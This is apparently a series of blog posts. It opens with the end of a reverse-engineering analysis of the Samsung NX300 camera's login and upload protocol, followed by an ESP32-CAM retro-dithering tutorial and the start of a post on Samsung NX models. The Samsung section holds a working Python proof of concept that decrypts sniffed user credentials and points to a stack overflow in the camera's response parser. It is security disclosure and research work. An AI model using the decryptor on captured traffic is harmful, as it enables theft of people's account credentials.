int encryptSessionKey(char **out_rsa_enc,char *keyspec)
{
int result;
char *keyspec_raw;
int keyspec_raw_len = String_base64Decode(keyspec,&keyspec_raw,&result);
char *dst = _rsaEncrypt(keyspec_raw,keyspec_raw_len,
"0x8ae4efdc724da51da5a5a023357ea25799144b1e6efbe8506fed1ef12abe7d3c11995f15
dd5bf20f46741fa7c269c7f4dc5774ce6be8fc09635fe12c9a5b4104a890062b9987a6b6d69
c85cf60e619674a0b48130bb63f4cf7995da9f797e2236a293ebc66ee3143c221b2ddf239b4
de39466f768a6da7b11eb7f4d16387b4d7",
"0x10001",&result);
*out_rsa_enc = dst;
}
The _rsaEncrypt()
function is using the BigDigits multiple-precision
arithmetic library to add
PCKS#1 v1.5 padding to the keyspec
, encrypt it with the supplied m
and e
values, and return the encrypted value. The result is a long hex number
string like the one we can see in the <Request/>
PCAP above.
Completing the HTTP POST: WebMakeLoginData()
contd.
Now that we have all the cryptographic ingredients together, we can return to actually crafting the HTTP request.
There are three different code paths taken by WebMakeLoginData()
. One into
WebMakeDataWithOAuth()
for the samsungimaging
and cyworld
sites, one
creating a x-www-form-urlencoded
HTTP POST to sandbox-auth.kakao.com
, and
one creating the XML <Request/>
we've seen in the packet trace for all other
social networks. Given the obscurity of the first three networks, we'll focus
on the last code path:
WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
WebString_Add_fmt(body,"%s%s%s",
"<Request Method=\"login\" Timeout=\"3000\" CameraCryptKey=\"",
encrypted_session_key,"\">\r\n");
if (site_idx != /*34*/ SITE_SKYDRIVE) {
WebString_Add_fmt(body,"%s%s%s","<UserName Value=\"",gWeb.enc_id,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s","<Password Value=\"",gWeb.enc_pw,"\"/>\r\n");
}
WebString_Add_fmt(body,"%s%s%s","<PersistKey Use=\"true\"/>\r\n",duid,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s","<SessionKey Type=\"APIF\"/>","\r\n");
WebString_Add_fmt(body,"%s%s%s","<CryptSessionKey Use=\"true\" Type=\"SHA1\" Value=\"",
gWeb.keyspec,"\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s","<ApplicationKey Value=\"",gWeb.application_key,
"\"/>\r\n");
WebString_Add_fmt(body,"%s%s","</Request>","\r\n");
body_len = strlen(body);
WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/auth HTTP/1.1","\r\n");
WebString_Add_fmt(header,"%s%s%s","Host: ",host,"\r\n");
WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
WebAddString(out_http_request, header);
WebAddString(out_http_request, body);
Okay, so generating XML via a fancy sprintf()
has been frowned upon for a
long time. However, if done correctly, and if there is no
attacker-controlled input with escape characters, this can be an acceptable
approach.
In our case, the duid
is surrounded by closing tags due to an obvious
programmer error, but beyond that, all parameters are properly controlled by
encoding them in hex, in base64, or in URL-encoded base64.
We are transmitting the RSA-encrypted session key (as CameraCryptKey
), the
AES-encrypted username and password (except when uploading to SkyDrive), the
duid
(outside of a valid XML element), the application_key
that we
encrypted earlier (but we are sending the unencrypted variable) and the
keyspec
in the CryptSessionKey
element.
The keyspec
? Isn't that the secret AES key? Well yes it is. All that RSA
code turns out to be a red herring, we get the encryption key on a silver
plate!
Decrypting the sniffed login credentials
Can it be that easy? Here's a minimal proof-of-concept in python:
#!/usr/bin/env python3
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from base64 import b64decode
from urllib.parse import unquote
import xml.etree.ElementTree as ET
import sys
def decrypt_string(key, s):
d = Cipher(algorithms.AES(key[0:16]), modes.CBC(key[16:])).decryptor()
plaintext = d.update(s)
return plaintext.decode('utf-8').rstrip('\0')
def decrypt_credentials(xml):
x_csk = xml.find("CryptSessionKey")
x_user = xml.find("UserName")
x_pw = xml.find("Password")
key = b64decode(x_csk.attrib['Value'])
enc_user = b64decode(unquote(x_user.attrib['Value']))
enc_pw = b64decode(unquote(x_pw.attrib['Value']))
return (key, decrypt_string(key, enc_user), decrypt_string(key, enc_pw))
def decrypt_file(fn):
key, user, pw = decrypt_credentials(ET.parse(fn).getroot())
print('User:', user, 'Password:', pw)
for fn in sys.argv[1:]:
decrypt_file(fn)
If we pass the earlier <Request/>
XML to this script, we get this:
User: x Password: z
Looks like somebody couldn't be bothered to touch-tap-type long values.
Now we also can see what kind of garbage stack data is used as the encryption keys.
On the NX300, the results confirm our analysis, this looks very much like
stack garbage, with minor variations between _secureRandom()
calls:
00000000: ffff ffff f407 a5b6 5201 0000 fc03 aeb6 ........R.......
00000010: ffff ffff 4872 0fb6 5201 0000 0060 0fb6 ....Hr..R....`..
00000000: ffff ffff f487 9ab6 5201 0000 fc83 a3b6 ........R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6 ....H...R.......
00000000: ffff ffff 48a2 04b6 5201 0000 0090 04b6 ....H...R.......
00000010: ffff ffff 48a2 04b6 5201 0000 0090 04b6 ....H...R.......
00000000: ffff ffff f4a7 9ab6 5201 0000 fca3 a3b6 ........R.......
00000010: ffff ffff 4812 05b6 5201 0000 0000 05b6 ....H...R.......
00000000: ffff ffff f4b7 99b6 5201 0000 fcb3 a2b6 ........R.......
00000010: ffff ffff 4822 04b6 5201 0000 0010 04b6 ....H"..R.......
00000000: ffff ffff 48f2 04b6 5201 0000 00e0 04b6 ....H...R.......
00000010: ffff ffff 48f2 04b6 5201 0000 00e0 04b6 ....H...R.......
On the NX mini, the data looks much more random, but consistently key==iv
-
suggesting that it is actually a sort of sha1(rand())
:
00000000: 00e0 fdcd e5ae ea50 a359 8204 03da f992 .......P.Y......
00000010: 00e0 fdcd e5ae ea50 a359 8204 03da f992 .......P.Y......
00000000: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7 .$...\...ou.>...
00000010: 0924 ea0e 9a5c e6ef f26f 75a9 3e97 ced7 .$...\...ou.>...
00000000: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412 ....\...,..6....
00000010: 98b8 d78f 5ccc 89a9 2c0f 0736 d5df f412 ....\...,..6....
00000000: d1df 767e eb51 bd40 96d0 3c89 1524 a61c ..v~.Q.@..<..$..
00000010: d1df 767e eb51 bd40 96d0 3c89 1524 a61c ..v~.Q.@..<..$..
00000000: d757 4c46 d96d 262f a986 3587 7d29 7429 .WLF.m&/..5.})t)
00000010: d757 4c46 d96d 262f a986 3587 7d29 7429 .WLF.m&/..5.})t)
00000000: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a .V.A.........V.z
00000010: dd56 9b41 e2f9 ac11 12b7 1b8c af56 187a .V.A.........V.z
Social media login response
The HTTP POST request is passed to WebOperateLogin()
which will create a TCP
socket to port 80 of the target host, send the request and receive the
response into a 2KB buffer:
bool WebOperateLogin(int sock_idx,char *buf,ulong site_idx) {
int buflen = strlen(buf);
SendTCPSocket(sock_idx,buf,buflen,0,false,0,0);
rx_buf = malloc(2048);
int rx_size = ReceiveTCPProcess(sock_idx,rx_buf,300);
bool login_result = WebCheckLogin(rx_buf,site_idx);
}
The TCP process (actually just a pthread) will clear the buffer and read up to 2047 bytes, ensuring a NUL-terminated result. The response is then "parsed" to extract success / failure flags.
Parsing the login response: WebCheckLogin()
The HTTP response (header plus body) is then searched for certain "XML" "fields" to parse out relevant data:
bool WebCheckLogin(char *buf,int site_idx) {
char value[512];
memset(value,0,512);
if (GetXmlString(buf,"ErrCode",value)) {
strcpy(gWeb.ErrCode,value); /* gWeb.ErrCode is 16 bytes */
if (!GetXmlString(buf, "ErrSubCode",value))
return false;
strcpy(gWeb.SubErrCode,value); /* gWeb.SubErrCode is also 16 bytes */
return false;
}
if (!GetXmlString(buf,"Response SessionKey",value))
return false;
strcpy(gWeb.response_session_key,value); /* ... 64 bytes */
memset(value,0,512);
if (!GetXmlString(buf,"PersistKey Value",value))
return false;
strcpy(gWeb.persist_key,value); /* ... 64 bytes */
memset(value,0,512);
if (!GetXmlString(buf,"CryptSessionKey Value",value))
return false;
memset(gWeb.keyspec,0,64);
strcpy(gWeb.keyspec,value); /* ... 64 bytes */
if (site_idx == /*34*/ SITE_SKYDRIVE) {
strcpy(gWeb.LoginPeopleID, "owner");
} else {
memset(value,0,512);
if (!GetXmlString(buf,"LoginPeopleID",value)) {
return false;
}
}
strcpy(gWeb.LoginPeopleID,value); /* ... 128 bytes */
if (site_idx == /*34*/ SITE_SKYDRIVE) {
memset(value,0,512);
if (!GetXmlString(buf,"OAuth URL",value))
return false;
ReplaceString(value,"&","&",skydriveURL);
}
return true;
}
The GetXmlString()
function is actually quite a euphemism. It does not
actually parse XML. Instead, it's searching for the first verbatim occurence
of the passed field name, including the verbatim whitespace, checking that
it's followed by a colon or an equal sign, and then copying everything from
the quotes behind that into out_value
. It does not check the buffer bounds,
and doesn't ensure NUL-termination, so the caller has to clear the buffer each
time (which it doesn't do consistently):
bool GetXmlString(char *xml,char *field,char *out_value) {
char *position = strstr(xml, field);
if (!position)
return false;
int field_len = strlen(field);
char *field_end = position + field_len;
/* snip some decompile that _probably_ checks for a '="' or ':"' postfix at field_end */
char *value_begin = position + fieldlen + 2;
char *value_end = strstr(value_begin,"\"");
if (!value_end)
return false;
memcpy(out_value, value_begin, value_end - value_begin);
return true;
Given that the XML buffer is 2047 bytes controlled by the attacker
server operator, and value
is a 512-byte buffer on the stack, this calls for
some happy smashing!
The ErrCode
and ErrSubCode
are passed to the UI application, and probably
processed according to some look-up tables / error code tables, which are
subject to reverse engineering by somebody else. Valid error codes seem to be:
4019 ("invalid grant" from kakaostory), 8001, 9001, 9104.
Logging out
The auth
endpoint is also used for logging out from the camera (this feature
is well-hidden, you need to switch the camera to "Wi-Fi" mode, enter the
respective social network, and then press the 🗑 trash-bin key):
<Request Method="logout" SessionKey="pmlyFu8MJfAVs8ijyMli" CryptKey="ca02890e42c48943acdba4e782f8ac1f20caa249">
</Request>
Writing a minimal auth handler
For the positive case, a few elements need to be present in the response XML.
A valid example for that is response-login.xml
:
<Response SessionKey="{{ sessionkey }}">
<PersistKey Value="{{ persistkey }}"/>
<CryptSessionKey Value="{{ cryptsessionkey }}"/>
<LoginPeopleID="{{ screenname }}"/>
<OAuth URL="http://snsgw.samsungmobile.com/oauth"/>
</Response>
The camera will persist the SessionKey
value and pass it to later requests.
Also it will remember the user as "logged in" and skip the /auth/
endpoint
in the future. It is unclear yet how to reset that state from the API side to
allow a new login (maybe it needs the right ErrCode
value?)
A negative response would go along these lines:
<Response ErrCode="{{ errcode }}" ErrSubCode="{{ errsubcode }}" />
And here is the respective Flask handler PoC:
@app.route('/<string:site>/auth',methods = ['POST'])
def auth(site):
xml = ET.fromstring(request.get_data())
method = xml.attrib["Method"]
if method == 'logout':
return "Logged out for real!"
keyspec, user, password = decrypt_credentials(xml)
# TODO: check credentials
return render_template('response-login.xml',
sessionkey=mangle_address(user),
screenname="Samsung NX Lover")
Uploading pictures
After a successful login, the camera will actually start uploading files with
WebUploadImage()
. For each file, either the /facebook/photo
or the
/facebook/video
endpoint is called with another XML request, followed by a
HTTP PUT
of the actual content.
bool WebUploadImage(int ui_ctx,int site_idx,int picType) {
if (site_idx == /*14*/ SITE_KAKAOSTORY) {
/* snip very long block handling kakaostory */
return true;
}
/* iterate over all files selected for upload */
for (int i = 0; i < gWeb.selected_count; i++) {
gWeb.file_path = upload_file_names[i];
gWeb.index = i+1;
char *buf = malloc(2048);
WebMakeUploadingMetaData(buf,site_idx);
WebOperateMetaDataUpload(site_idx,0,buf);
WebOperateUpload(0,picType);
}
return true;
}
Upload request: WebOperateMetaDataUpload()
The image matadata is prepared by WebMakeUploadingMetaData()
and sent by
WebOperateMetaDataUpload()
. The (user-editable) facebook folder name is
properly XML-escaped:
bool WebMakeUploadingMetaData(char *out_http_request,int site_idx) {
/* snip hostname selection similar to WebMakeLoginData */
if (strstr(gWeb.file_path, "JPG") != NULL) {
WebParseFileName(gWeb.file_path,gWeb.file_name);
/* "authenticate" the request by SHA1'ing some static secrets */
char header_for_sig[256];
sprintf(header_for_sig,"/%s/photo.upload*%s#%s:%s",gWeb.site,
gWeb.persist_key,gWeb.response_session_key,gWeb.keyspec);
char *crypt_key = sha1str(header_for_sig);
body = WebMalloc(2048);
WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
WebString_Add_fmt(body,"%s%s%s%s%s",
"<Request Method=\"upload\" Timeout=\"3000\" SessionKey=\"",
gWeb.response_session_key,"\" CryptKey=\"",crypt_key,"\">\r\n");
WebString_Add_fmt(body,"%s%s","<Photo>","\r\n");
if (site_idx == /*1*/ SITE_FACEBOOK) {
char *folder = xml_escape(gWeb.facebook_folder);
WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"",folder,"\"/>\r\n");
} else
WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"","Samsung Smart Camera","\"/>\r\n");
WebString_Add_fmt(body,"%s%s%s%s","<File Name=\"",gWeb.file_name,"\"/>","\r\n")
if (site_idx != /*9*/ SITE_WEIBO) {
WebString_Add_fmt(body,"%s%s%s%s","<Content><![CDATA[",gWeb.description,"]\]></Content>","\r\n");
}
WebString_Add_fmt(body,"%s%s","</Photo>","\r\n");
WebString_Add_fmt(body,"%s%s","</Request>","\r\n");
body_len = strlen(body);
WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/photo HTTP/1.1","\r\n");
WebString_Add_fmt(header,"%s%s%s","Host: ",hostname,"\r\n");
WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
strcat(header,body);
strcpy(out_http_request,header);
return true;
}
if (strstr(gWeb.file_path, "MP4") != NULL) {
/* analogous to picture upload, but for video */
} else
return false; /* wrong file type */
}
bool WebOperateMetaDataUpload(int site_idx,int sock_idx,char *buf) {
/* snip hostname selection similar to WebMakeLoginData */
bool result = WebSocketConnect(sock_idx,hostname,80);
if (result) {
SendTCPSocket(sock_idx,buf,strlen(buf),0,false,0,0);
response = malloc(2048);
ReceiveTCPProcess(sock_idx,response,300);
return WebCheckRequest(response);
}
return false;
}
The generated XML looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<Request Method="upload" Timeout="3000" SessionKey="deadbeef" CryptKey="4f69e3590858b5026508b241612a140e2e60042b">
<Photo>
<Album ID="" Name="Samsung Smart Camera"/>
<File Name="SAM_9838.JPG"/>
<Content><![CDATA[Upload test message.]]></Content>
</Photo>
</Request>
Upload response: WebCheckRequest()
The server response is checked by WebCheckRequest()
:
bool WebCheckRequest(char *xml) {
/* check for HTTP 200 OK, populate ErrCode and ErrSubCode on error */
if (!GetXmlResult(xml))
return false;
memset(web->HostAddr,0,64); /* 64 byte buffer */
memset(web->ResourceID,0,128); /* 128 byte buffer */
GetXmlString(xml,"HostAddr",web->HostAddr);
GetXmlString(xml,"ResourceID",web->ResourceID);
return true;
}
Thus the server needs to return an (arbitrary) XML element that has the two
attributes HostAddr
and ResourceID
, which are stored in the gWeb
struct
for later use. As always, there are no range checks (but those fields are in
the middle of the struct, so maybe not the best place to smash.
Actual media upload: WebOperateUpload()
The code is pretty straight-forward, it creates a buffer with the (downscaled or original) media file, makes a HTTP PUT request to the host and resource obtained earlier, and submits that to the server:
bool WebOperateUpload(int sock_idx,ulong picType) {
char hostname[128];
memset(hostname,0,128);
WebParseIP(gWeb.HostAddr,hostname); /* not required to be an IP */
int port = WebParsePort(web->HostAddr);
if (!WebSocketConnect(sock_idx,hostname,port))
return false;
char *file_buffer;
int file_size;
char *request = WebMalloc(2048);
WebMakeUploadingData(request,&file_buffer_ptr,&file_size,picType);
if (WebUploadingData(sock_idx,request,file_buffer_ptr,file_size)) {
if (strstr(gWeb.file_path,"JPG") || strstr(gWeb.file_path, "MP4"))
WebFree(file_buffer_ptr);
WebSocketClose(sock_idx);
}
}
bool WebMakeUploadingData(char *out_http_request,char **file_buffer_ptr,int *file_size_ptr,ulong picType) {
request = WebMalloc(512);
if (strstr(gWeb.file_path,"JPG")) {
/* scale down or send original image */
if (picType == 0) {
int megapixels = 2;
if (strcmp(gWeb.site, "facebook") == 0)
megapixels = 1;
NASLWifi_jpegResizeInMemory(gWeb.file_path,megapixels,file_buffer_ptr,file_size_ptr);
} else
NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
} else if (strstr(gWeb.file_path,"MP4")) {
NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
}
WebString_Add_fmt(request,"%s%s%s%s","PUT /",gWeb.ResourceID," HTTP/1.1","\r\n");
if (strstr(gWeb.file_path,"JPG")) {
WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
} else if (strstr(gWeb.file_path,"MP4")) {
/* copy-paste-fail? should be video... */
WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
}
WebString_Add_fmt(request,"%s%d%s","Content-Length: ",*file_size_ptr,"\r\n");
WebString_Add_fmt(request,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
WebString_Add_fmt(request,"%s%d/%d%s","Content-Range: bytes 0-",*file_size_ptr - 1,
*file_size_ptr,"\r\n");
WebString_Add_fmt(request,"%s%s%s","Host: ",gWeb.HostAddr,"\r\n\r\n");
strcpy(out_http_request,request);
}
The actual upload function WebUploadingData()
is operating in a
straight-forward way, it will send the request buffer and the file buffer, and
check for a HTTP 200 OK response or for the presence of ErrCode
and
ErrSubCode
.
Writing an upload handler
We need to implement a /<site>/photo
handler that returns an (arbitrary)
upload path and a PUT
handler that will process files on that path.
The upload path will be served using this XML (the hostname is hardcoded
because we already had to hijack the snsgw
hostname anyway):
<Response HostAddr="snsgw.samsungmobile.com:80" ResourceID="upload/{{ sessionkey }}/{{ filename }}" />
Then we have the two API endpoints:
@app.route('/<string:site>/photo',methods = ['POST'])
def photo(site):
xml = ET.fromstring(request.get_data())
# TODO: check session key
sessionkey = xml.attrib["SessionKey"]
photo = xml.find("Photo")
filename = photo.find("File").attrib["Name"]
# we just pass the sessionkey into the upload URL
return render_template('response-upload.xml', sessionkey, filename)
@app.route('/upload/<string:sessionkey>/<string:filename>', methods = ['PUT'])
def upload(sessionkey, filename):
d = request.get_data()
# TODO: check session key
store = os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(sessionkey))
os.makedirs(store, exist_ok = True)
fn = os.path.join(store, secure_filename(filename))
with open(fn, "wb") as f:
f.write(d)
return "Success!"
Conclusion
Samsung implemented this service back in 2009, when mandatory SSL (or TLS) wasn't a thing yet. They showed intent of properly securing users' credentials by applying state-of-the-art symmetric and asymmetric encryption instead. However, the insecure (commented out?) random key generation algorithm was not suitable for the task, and even if it were, the secret key was provided as part of the message anyway. A passive attacker listening on the traffic between Samsung cameras and their API servers was able to obtain the AES key and thus decrypt the user credentials.
In this post, we have analyzed the client-side code of the NX300 camera, and re-created the APIs as part of the samsung-nx-emailservice project.
This post is about shooting 16-color EGA (1984) styled retro photos right on the 4$ ESP32-CAM board and storing them to µSD in the arcane TGA (1984) file format.
For that, we need to read RGB images, convert them to 16 colors, apply dithering, and store a TGA image file.
ESP32-EGA16-TGA source code on GitHub.
Introduction
This year's Shitty Camera Challenge has some space for digital cameras, and so the author experimented with different devices. The last one, the ESP32-CAM, was obtained after the HomeAssistant setup wizard promised an easy way to monitor analog utility meters with camera and AI, and what could be shittier than a 4$ camera PCB?
ESP32-CAM
The ESP32-CAM turned out to be even shittier than anticipated. Of the four sensors ordered, three had visible defects. The image quality is green. The board pinout is ridiculous, with the LED flash wired to the SD data line, the PCB LED blocking WiFi, and no fully usable GPIOs.
Still, the ESP32 is quite a beefy beast for an embedded SoC, with a 240MHz 32-bit core and ~500KB of SRAM on die, plus some 4MB of PSRAM on the board to store camera pictures. The pictures can be streamed over WiFi or stored to a µSD card, giving us some flexibility.
The CPU and memory specs are far beyond 1980s desktop computers, so we are not limited in the choice of algorithms to perform our task, and we can easily cheat where needed.
The platform is supported by Arduino IDE and by PlatformIO, typically programmed in C/C++, and there are example projects to implement a webcam or to take pictures to µSD.
Reading RGB data from the sensor into memory
The camera API supports various streaming formats, from pre-compressed JPEG to RAW:
typedef enum {
PIXFORMAT_RGB565, // 2BPP/RGB565
PIXFORMAT_YUV422, // 2BPP/YUV422
PIXFORMAT_YUV420, // 1.5BPP/YUV420
PIXFORMAT_GRAYSCALE, // 1BPP/GRAYSCALE
PIXFORMAT_JPEG, // JPEG/COMPRESSED
PIXFORMAT_RGB888, // 3BPP/RGB888
PIXFORMAT_RAW, // RAW
PIXFORMAT_RGB444, // 3BP2P/RGB444
PIXFORMAT_RGB555, // 3BP2P/RGB555
} pixformat_t;
The easiest format for us to process is RGB888, with one byte for each of the three colors, stored in a two-dimensional pixel array. Except when the API is a lie:
E (1195) esp32 ll_cam: Requested format is not supported
Luckily, the github-actions bot closed the issue as completed, so it's
solved, right? RIGHT??? The error message comes from
ll_cam_set_sample_mode()
and its source code reveals that the actually implemented options are:
PIXFORMAT_GRAYSCALE
PIXFORMAT_YUV422
PIXFORMAT_JPEG
PIXFORMAT_RGB565
Greyscale gives us one brightness byte per pixel, but we want to have colors. YUV422 stores two pixels in four bytes and requires a color space conversion. JPEG requires that as well, but only after parsing and uncompressing the JPEG file. RGB565 stores one pixel in two bytes, with five bits for red and blue, respectively, and six bits for green. That gives us enough headroom to do some dithering for a 16-color palette and spares us from non-linear luminance and chrominance formulas.
Furthermore, RGB565 can be converted to RGB888 with just a bit of bit shifting, so there we go. We configure the camera to take images in QVGA (320x240, close enough to the EGA 320x200 original) into PSRAM:
camera_config_t config;
/* ... snip boilerplate ... */
config.pixel_format = PIXFORMAT_RGB565;
config.frame_size = FRAMESIZE_QVGA;
config.fb_location = CAMERA_FB_IN_PSRAM;
esp_camera_init(&config);
However, after firing up the image sensor and taking a shot, we realize that everything is green. Not monochrome green, but bad-white-balance green. The suggested workaround is to give the camera some time to calibrate after enabling auto white balance, by taking and discarding a few shots:
sensor_t *s = esp_camera_sensor_get();
/* Enable AWB and AWB gain in auto mode */
s->set_whitebal(s, 1);
s->set_awb_gain(s, 1);
s->set_wb_mode(s, 0);
/* DO NOT DO COPY THIS! Set contrast and saturation to max for the EGA effect */
s->set_contrast(s, 2);
s->set_saturation(s, 2);
/* Take and discard a few pictures */
for (int i= 0 ; i < WARMUP_PICS; i++) {
camera_fb_t *fb = esp_camera_fb_get();
if (fb)
esp_camera_fb_return(fb);
}
After that (with WARMUP_PICS=10
), the image is less green. Not quite
true-color, but acceptable. The raw RGB565 image bytes (320*240*2 = 153600 of
them) can be found in fb->buf
:
As noted above, the image is 320*240 and not 320*200, as the EGA card didn't
have square pixels. We can compensate that by just skipping one of each six
rows when converting. Then we just can fix the aspect ratio in post-production
for modern PC displays, by scaling up to 200%x240%
.
Interlude: viewing RGB565 images
An obvious intermediate step when developing a camera application is storing the "raw" or "intermediate" pixel arrays right to "disk", i.e. the µSD card.
RGB888 images can be trivially converted (and scaled up for modern displays) by ImageMagick, the author's favorite image processing CLI:
convert -depth 8 -size 320x240 input.rgb -scale 200% output.png
There is no direct driver for RGB565, but there is this RGB565 parser pattern and it leaves the author speechless. WTF. ImageMagick is the Swiss army knife of image processing, but is this Turing complete?!?
So maybe the second favorite image processing tool has something in the pipeline? Oh yes indeed:
ffmpeg -vcodec rawvideo -f rawvideo -pix_fmt rgb565be -s 320x240 -i input.rgb565 -f image2 -vcodec png output.png
Et voila! We can store intermediate pictures, test individual phases of the pipeline and see where things go wrong. The ESP32 µSD interface is quite slow, so storing the "huge" 150KiB and 225KiB images takes a second or so of intensive flash LED blinking. And that LED gets rather hot, so watch out for your fingers!
EGA 16-color palette
The EGA color palette was a natural choice for this experiment, because its 16 colors are well known and still in use today in terminal mode applications (including most things you can access through SSH), and while they don't go back to roman horse asses or 1920's punch cards, they were created by IBM in 1981 for the IBM CGA adapter based on a simple one bit per color plus one intensity bit scheme, and an analog hardware hack to replace the ugly yellow ocher with a slightly less unpleasant brown.
The result are the following natural colors beloved by retro pixel artists, perfectly suited for photography:
0 #000000 | 1 #0000AA | 2 #00AA00 | 3 #00AAAA | 4 #AA0000 | 5 #AA00AA | 6 #AA5500 | 7 #AAAAAA |
8 #555555 | 9 #5555FF | 10 #55FF55 | 11 #55FFFF | 12 #FF5555 | 13 #FF55FF | 14 #FFFF55 | 15 #FFFFFF |
Technically, the full EGA color palette has two bits per color, resulting in 64 total colors, but you can only ever choose 16 of them, and as the defaults are well-known, we are sticking to them.
To provide the best resulting image quality, for each pixel we will pick the closest EGA color, by minimizing the Euclidean distance in three-dimensional space, or in different words, we'll calculate the squared differences for each color channel and pick the smallest one:
for (int i = 0; i < 16; i++) {
int delta_r = abs(EGA_PALETTE[i][0]-r);
int delta_g = abs(EGA_PALETTE[i][1]-g);
int delta_b = abs(EGA_PALETTE[i][2]-b);
int match = delta_r*delta_r + delta_g*delta_g + delta_b*delta_b;
if (match < best_match) {
best_match = match;
best_color = i;
}
}
We could implement a fancy look-up-table for each of the 65536 possible RGB565 values, but we have plenty of CPU cycles and not so much RAM, and only 64000 pixels, so we just do the look-up for each of them.
The results look surprisingly monochrome, with just a few colored areas. It turns out that the low saturation of the ESP camera sensor maps most real-world motives onto the four shades of grey when using the "closest color" approach. To increase the saturation, we'd have to convert our pixels into another colorspace, so let's look for a different approach.
Dithering of photos to 16 colors
The standard (old-school) technique to map natural colors to a limited palette is color dithering. There are different algorithms, with different trade-offs, resulting in different image quality.
The simplest one, average dithering, assigns the closest palette color to each pixel, and we've seen it in action above.
Floyd-Steinberg from 1975 is the most sophisticated one, giving the most natural results and having a nice natural and irregular pixel distribution. It works by taking the error (difference between the original color and the mapped palette color) of each pixel, and spreading ("propagating") that error out to the neighbor pixels below and to the right. This creates a statistical distribution of colored pixels proportional to the level of the respective color in the image. The algorithm is clever by only applying the propagation to pixels right and below of the current one, allowing to process an image in a single linear pass.
However, it means that we need to change pixel values one row ahead in our buffer, and adding something to a pixel's color might overflow it, so we need to clip values to the (0, 31) or (0, 63) range. However, we can get a very good approximation by only propagating the error to the next pixel in the current row, with much less work:
There are slightly noticeable vertical line artifacts at the left edge, as we reset the error variables at the beginning of the column (otherwise, colors from the right edge would "bleed over"), that wouldn't be there with the two-dimensional approach of Floyd-Steinberg. Beyond that, this is already too good and almost too true-color to really count as a shitty image.
There is one approach that was easier to implement on 1980s hardware (and that allowed better compression of the images), and that is ordered (or Bayes) dithering. It's using a (most often square) threshold table that is applied repeatedly to the image, changing the respective colors and resulting in a visible cross-hatch pattern.
By simply taking a bayer pattern table from StackOverflow, and doubling the threshold values to compensate for the pale camera colors, we get this:
Now why is this so monochrome again? Well, the Bayer pattern is applied individually to each of the three color channels, and we are using the same pattern position for the three channels of a pixel, so effectively we always apply a greyscale threshold. By simply shifting the pattern one pixel to the right for green and one pixel down for blue, we get a much better result:
Perfect! That's exactly the desired image quality to compete in the Shitty Camera Challenge!
Saving as TGA
Actually, TGA wasn't the first choice format for this project. The author's favorite is PCX (1985), which is only slightly younger than TGA, but was supported by the author's favorite image editing tool, that also featured the most creative versioning scheme: Deluxe Paint II Enhanced 2.0.
However, the author's favorite image viewer, Geeqie, fails to properly display PCX files, and fixing that was way out-of-scope for this project, or so the author thought. So we stick to TGA, which seems to be properly supported based on throwing a few test files at it.
The file format is simple when compression is disabled, coming with a small 18-byte header followed by the palette (in BGR order, not RGB), and then the packed raw pixel data, from bottom to top.
Well. In theory, TGA supports various color depths and palette types from 1 bit per pixel to RGBA. What we have is a 16-color 4bpp (4 bits per pixels; not to be confused with the "BPP" bytes-per-pixel used in the ESP32 headers) image with a 16*3 byte palette. However, the image processing tools that claim to "support" TGA don't actually accept arbitrary variants.
- Geeqie silently fails to display a 4bpp image
ImageMagick mis-treats anything non-default as 8pp with an opaque error message:
convert-im6.q16: unable to read image data 'shitty_133.xyz.tga' @ error/tga.c/ReadTGAImage/457.
So we have to artificially inflate our pixel data from 4bpp to 8bpp, and because the tools will also ignore the "number of colors in the palette" field and instead use the "number of colors in the image" field, we need to store a full 256-color palette in the file, of which we will only use the first 16 entries:
memcpy(tga, &header, sizeof(TgaHeader));
for (int i = 0; i < STORE_COLORS; i++) {
tga[sizeof(TgaHeader) + i*3 + 0] = EGA_PALETTE[i % COLORS][2];
tga[sizeof(TgaHeader) + i*3 + 1] = EGA_PALETTE[i % COLORS][1];
tga[sizeof(TgaHeader) + i*3 + 2] = EGA_PALETTE[i % COLORS][0];
}
for (y = 0; y < HEIGHT; y++) {
src_pos = y*WIDTH;
dst_pos = (HEIGHT - y - 1)*WIDTH;
memcpy(tga + sizeof(TgaHeader) + 3*256 + dst_pos, framebuffer + src_pos, WIDTH);
}
The remaining code of the project is based on existing examples. Find the full ESP32-EGA16-TGA source code on GitHub. Beware, it's as shitty as everything shown above, to fit into the project. This is not production-quality C code.
Many years ago, in the summer of 2014, I fell into the rabbit hole of the Samsung NX(300) mirrorless APS-C camera, found out it runs Tizen Linux, analyzed its WiFi connection, got a root shell and looked at adding features.
Next year, Samsung "quickly adapted to market demands" and abandoned the whole NX ecosystem, but I'm still an active user of the NX500 and the NX mini (for infrared photography). A few months ago, I was triggered to find out which respective framework is powering which of the 19(!!!) NX models that Samsung released between 2010 and 2015. The TL;DR results are documented in the Samsung NX model table, and this post contains more than you ever wanted to know, unless you are a Samsung camera engineer.
